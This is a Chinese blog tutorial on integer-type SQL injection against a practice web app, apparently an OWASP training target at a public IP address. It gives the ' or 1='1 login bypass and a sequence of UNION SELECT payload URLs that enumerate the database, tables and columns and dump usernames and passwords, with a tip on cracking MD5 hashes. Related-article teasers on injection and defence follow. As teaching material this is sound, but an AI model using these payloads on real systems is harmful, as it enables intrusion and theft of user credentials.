SQL注入获取用户名密码练习(integer型注入)

最新推荐文章于 2025-05-27 15:01:42 发布
原创 最新推荐文章于 2025-05-27 15:01:42 发布 · 1.8w 阅读 · 30 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了如何通过SQL注入攻击获取数据库信息,包括确认注入点、查询数据库结构、表名、字段名及内容的方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

万能密码 ' or 1='1

select name,pass from tbAdmin where name=‘admin’ and pass=‘123456’

select name,pass from tbAdmin where name=’’ or 1=‘1’ and pass=‘123456’
1=‘1’ 永远为真

 

这个也是OWASP放出来的一个web安全学习平台,PHP+MySQL,主要有SQL注入练习及简单绕过

地址:http://43.247.91.228:83/

1、找测试注入点

http://43.247.91.228:83/content-1/index.php?id=0

2、测试加 ' 号,页面返回错误(可能存在注入点)

3、确认是否存在注入点

http://43.247.91.228:83/content-1/index.php?id=0 and 1=1 页面返回正常

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 页面返回错误

证明存在注入点

4、查询当前表有多少列,用order by测试,切换数字,直到不出错为止,测试结果为

http://43.247.91.228:83/content-1/index.php?id=0  order by 8

5、测试哪列数据有回显(1,2,3列都可以显示)

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,2,3,4,5,6,7,8

5、查询数据库相关信息

查询当前用户权限 http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,user(),3,4,5,6,7,8

查询当前数据库版本 http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,version(),3,4,5,6,7,8

查询当前数据库名称  http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,database(),3,4,5,6,7,8

6、查询inject数据库里的表名(将表名'inject'进行ANSI编码结果为%27%69%6E%6A%65%63%74%27)表名为users

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables where table_schema = %27%69%6E%6A%65%63%74%27

注:这里可以使用 limit a,1 测试有多少个表,a表示表里的第几行(这里测试只有一个users表)

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,table_name,3,4,5,6,7,8 from information_schema.tables where table_schema = %27%69%6E%6A%65%63%74%27 limit 0,1 --

7、查询users表里的字段名(将表名'users'进行ANSI编码结果为%27%75%73%65%72%73%27)

users表的字段名分别为 idusers,name,email,password,ua,ref,host,lang

注:这里使用limit a,1 测试有多少个字段,变化a的值0,1,2....7,网址最后要加上注释符  --

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select 1,column_name,3 ,4,5,6,7,8 from information_schema.columns where table_name = %27%75%73%65%72%73%27 limit 0,1--

8、查询字段里的内容

在这里已经知道当前数据库是inject,有users表,表里有 idusers,name,email,password,ua,ref,host,lang 8个字段,这时可以使用,1,2,3来显示需要查看的字段内容,这里演示,name,password,host

http://43.247.91.228:83/content-1/index.php?id=0 and 1=2 union select name, password,host,4,5,6,7,8 from users limit 0,1--

注:这里使用limit a,1 测试有多少个字段,变化a的值0,1,2....直到出错为止,就可以遍历出所有用户,网址最后要加上注释符  --

这里是密码是明码的用户

这里是密码是hash值的用户,登录MD5网站解密即可

解密结果

9、到这里找寻用户名,密码已经结束,找寻后台登录即可

 

 

 

综合案例(账号密码登录和SQL注入
IT深耕十余载,大道之简
05-02 1968
在后台,我们使用SQL查询语句来验证用户输入的用户名密码是否与数据库中存储的相匹配。然而,如果我们在编写上述SQL查询语句时没有对用户输入进行适当的过滤或转义,就可能会面临SQL注入的风险。攻击者可以在用户名密码的输入框中输入一些特殊字符,从而改变SQL查询语句的语义,达到绕过登录验证或窃取数据的目的。当用户输入用户名密码后,后台会执行一条SQL查询语句来验证输入的用户名密码是否与数据库中存储的相匹配。始终为真,所以这个查询语句会返回数据库中所有的用户数据,从而绕过了登录验证。
基于错误的 SQL 注入获取用户名密码的哈希值)
m0_74390206的博客
07-01 706
1.开启OWASP靶机和Kali虚拟机2.kali中登陆dvwa(用户名密码都是 admin),进入 SQL InjectionSQL 注入)页面,安全等级调为low。
SQL 三种注入方式详解,(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
05-27 3895
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
SQL注入获取MySQL用户表密码
老洋
01-03 1841
用 group by 验证(字段个数)使用二分法。
渗透测试——万能密码POST注入
zjdda的博客
05-20 3926
1.万能密码的原理 数据库没有对前端输入的参数的合法性做过率,并且账号和密码 一起输入,可以通过编写恶意语句,将用户与密码的输入结果判断为真,就实现了万能密码的登录。 2.万能密码实例: 查询语句select * from ‘.KaTeX parse error: Double superscript at position 21: …e.' where id=' '̲ and pass=' '; …t_name.’ where id=’ sdadaad’ and pass=’ ‘or’1’=‘1’; 由于
sql注入获取网站后台管理员账号与密码
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
sql注入
weixin_43801718的博客
09-19 752
sql注入: 所谓的SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或请求页面的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 具体来说,它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。 SQL注入中最常见利用的系统数据库,经常利用...
一文读懂网页表单SQL注入漏洞原理及各种场景利用
master_chenchen的博客
01-09 712
其中,sqlmap堪称是SQL注入界的瑞士军刀,它能够自动检测并利用多种类SQL注入漏洞,支持几乎所有主流数据库系统,并提供丰富的选项供使用者定制化攻击策略。不过值得注意的是,虽然这些工具极大地降低了实施SQL注入的技术门槛,但也使得防范难度相应增加,因此我们必须时刻保持警惕,不断完善自身的防护体系。你可以把这里当作自己的家,无论是工作之余的小憩,还是寻找灵感的驿站,我都希望你能在这里找到属于你的那份快乐和满足。
Java的JDBC最全基础笔记(SQL注入
weixin_55415300的博客
12-05 2041
1、JDBC:Java DataBase Connectivity,可以理解为是以前的Socket桥梁,或流读写数据库(1)确切的说,JDBC是Java平台提供的一套统一的执行规范/标准(2)那么我们知道通常定义规范,一般都要定义一些接口,所以JDBC这一套规范中定义了很多的接口和类及方法(3)那么接口是不能干活的,需要子类去完成,那么子类需要谁去完成?(4)Java对应多种数据库,那么就需要数据库去实现这个接口,Mysql数据库要去实现,Oracle的数据库也要去实现;
SQL注入防护最佳实践】:企业级防御策略和案例分享,让你的企业更安全
SQL注入攻击是一种针对数据库的常见安全威胁,通过插入恶意SQL代码到输入字段来操纵数据库。本文首先概述了SQL注入攻击的基本概念及其广泛的影响,随后深入探讨了其理论基础,包括攻击原理和风险评估。为应对这一...
后端领域 SQL 数据库的安全漏洞防范措施
架构师的AI之路,分享AI应用开发架构的学习与实践。
04-29 694
在当今数字化时代,后端领域的 SQL 数据库存储着大量的敏感信息,如用户的个人资料、财务数据等。然而,SQL 数据库面临着诸多安全威胁,这些威胁可能导致数据泄露、系统瘫痪等严重后果。本文的目的是深入探讨 SQL 数据库常见的安全漏洞,并详细介绍相应的防范措施,以帮助开发者和安全人员提高 SQL 数据库的安全性。范围涵盖了常见的 SQL 安全漏洞类,如 SQL 注入、暴力破解、权限滥用等,以及针对这些漏洞的防范技术和最佳实践。
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
SQL注入原理(基本语句/高级查询/高级注入/Mysql账号密码修改)
ki2637192651的博客
06-21 702
SQL注入 (Structured Query Language lnjection)脚本注入式的攻击、恶意用户输入用来影响被执行的SQL脚本SQL注入,就是攻击者通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询宇符串,最终达到让后台数据库执行恶意的SQL命令的目的,并根据程序返回的结果,获得某些攻击者想得知的数据。四.数据库/表的查看与筛选。SQL注入SQL指令,高级注入,联合union查询,order by,mysql用户创建,密码修改
SQL注入攻击的原理、分类和防御方法
Andrew的博客
02-27 2万+
一.SQL注入攻击原理 恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中,同时程序本身对用户输入内容过分信任而未对恶意用户插入的SQL语句进行过滤,导致SQL语句直接被服务端执行。   二.SQL注入攻击分类 (1)注入点的不同分类 数字类注入 字符串类注入 (2)提交方式的不同分类 GET注入 POST注入 COOKIE注入 HTTP注入 (3)获取信息的方...
SQL注入
BKN711的博客
08-05 2022
web应用程序在接收相关数据参数时未做好过滤,将其直接带入到数据库中查询,导致攻击者可以拼接执行构造的SQL语句。通过sql注入,拿到管理员账号和密码(1)利用order by 测出表的列数,order by在mysql中的作用是排序,当我们order by后面跟的列数大于数据库表的列数时,会报错当我们用order by 4时报错,所以得知该表有3列(2)再用union select 1,2,3 判断回显位得知回显位在2,3位(3)爆出数据库(4)爆出表名。
【JDBC】----综合案例(账号密码登录和SQL注入
swy2560666141的博客
12-06 2546
目录分享第二十一篇励志语录 一:账号密码登录1 创建user表1.1、创建一张用户表user,表的字段如下:1.2、向user表中插入两条数据:2 实现登录二、SQL注入2.1 SQL注入的效果的演示2.1.1 SQL注入代码2.1.2 SQL注入效果2.2 什么是SQL注入2.3 如何避免SQL注入三:PrepareStatement解决SQL注入(重要)3.1 PreparedStatement的应用3.1.1 参数标记3.1.2 动态参数绑定3.2 综合案例 id,用户编号,主键、自动增长。usern
SQL注入——通过注入得到已知用户名密码
热门推荐
以梦为马,不负韶华
12-08 2万+
· PHP代码如下: <?php //error_reporting(0); $link =mysqli_connect('localhost', 'root', 'root', 'test'); if (!$link) { die('Could not connect to MySQL: ' .mysqli_connect_error()); } $link->se
简单的SQL注入---id和万能密码
qq_74414939的博客
05-08 2861
id和万能密码
SQL注入1(登录用户名密码
2302_81133665的博客
06-03 2232
在做ctf赛题的时候,我们经常遇到sql注入的题,这篇文章就是针对输入用户名密码登录注册题的一个知识总结。
揭秘SQL注入万能密码:常见技巧与防范
在提供的标题“sql注入万能密码”中,所谓的“万能密码”实际上是指一系列常用于测试或尝试破解数据库的SQL注入字符串,这些字符串利用了SQL语法的某些特性来达到目的。 1. **基础原理**: SQL注入是通过在用户输入...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值